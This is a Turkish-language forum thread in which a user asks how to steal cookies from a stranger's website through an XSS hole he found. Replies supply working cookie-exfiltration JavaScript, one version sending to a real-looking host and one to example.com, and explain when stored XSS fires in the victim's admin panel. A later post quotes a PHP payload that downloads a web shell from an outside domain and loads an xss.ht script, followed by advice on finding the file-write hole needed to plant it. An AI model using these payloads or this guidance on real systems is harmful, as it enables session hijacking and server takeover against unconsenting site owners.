Web bilgisi olan herkes konuya lütfen

Xss açıklı bir site buldum cookiesini çekmek istedim
<script>location.href='http://hungry-sammet.20-231-41-40.plesk.page/dusencookie.php'+escape(document.cookie)</script>
Bu kodu yazdım şimdi adamın sitesine düşen girişler bana gelmiyor bana gelmediği gibi de adam txtye girince https://hungry-sammet.20-231-41-40.plesk.page/dusencookie.php?cookie=
Bu siteye atıyor adamı ve beyaz bir ekran oluyor
Yardım edin bana, adamın cookiesini xss açığından nasıl çekerim?

 

yanlış javascript kodunu yazmışsın.
basit bir şekilde XMLHTTPrequest atarak işi çözebilirsin.

 

yanlış javascript kodunu yazmışsın.
basit bir şekilde XMLHTTPrequest atarak işi çözebilirsin.

Peki onu nasıl atarım?

 

Peki onu nasıl atarım?

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://example.com/cookijs.php?cookies='+escape(document.cookie), true);
xhr.send(null);

 

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://example.com/cookijs.php?cookies='+escape(document.cookie), true);
xhr.send(null);

Saol

 

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://example.com/cookijs.php?cookies='+escape(document.cookie), true);
xhr.send(null);

Olmuyor yine oluşan dosyanın ve sitenin içi beyaz

 

Olmuyor yine oluşan dosyanın ve sitenin içi beyaz

Aga XSS client tarafta çalışır biliyorsun dimi bunları?
Eğer XSS varsa bekleyeceksin hedef web appteki userın o stored xss payloadını çalıştırmasını yani şunu demek istiyorum
karşıdaki kişi kendi tarayıcısında admin paneline girmeli ki xss payload çalışssın o girmediği sürece payload çalışmaz client side çünkü

 

Aga XSS client tarafta çalışır biliyorsun dimi bunları?
Eğer XSS varsa bekleyeceksin hedef web appteki userın o stored xss payloadını çalıştırmasını yani şunu demek istiyorum
karşıdaki kişi kendi tarayıcısında admin paneline girmeli ki xss payload çalışssın o girmediği sürece payload çalışmaz client side çünkü

Heee anladım usta sağol

 

yanlış javascript kodunu yazmışsın.
basit bir şekilde XMLHTTPrequest atarak işi çözebilirsin.

><?php $çıktı = shell_exec('wget https://www.merbamakina.com.tr/tema/genel/uploads/ik/shell.txt && mv shell.txt shell.php'); echo "<pre>$çıktı</pre>";?><script src=https://wulk4nsploix.xss.ht></script>
bu nedir peki

 

><?php $çıktı = shell_exec('wget https://www.merbamakina.com.tr/tema/genel/uploads/ik/shell.txt && mv shell.txt shell.php'); echo "<pre>$çıktı</pre>";?><script src=https://wulk4nsploix.xss.ht></script>
bu nedir peki

sistemde yazma yetkisi varsa ve yazılan dosya php ise önlem alınmadıysa sisteme shell çekilebiliri.
sistemine shell yüklenmiş kanks.

 

sistemde yazma yetkisi varsa ve yazılan dosya php ise önlem alınmadıysa sisteme shell çekilebiliri.
sistemine shell yüklenmiş kanks.

Xss açığından mı yüklemiş?ben nasıl yükleye bilirim peki kanka?

 

Xss açığından mı yüklemiş?ben nasıl yükleye bilirim peki kanka?

Hayır bu açık dosya yazma açığı.
Senin yüklemen için ilk önce o açığın nerede olduğunu bilmen lazım. Uygulamanın hangi kısmında yazdığım php kodları uygulamada çalışıyor bunu tespit etmen lazım.

 

Hayır bu açık dosya yazma açığı.
Senin yüklemen için ilk önce o açığın nerede olduğunu bilmen lazım. Uygulamanın hangi kısmında yazdığım php kodları uygulamada çalışıyor bunu tespit etmen lazım.

Anladım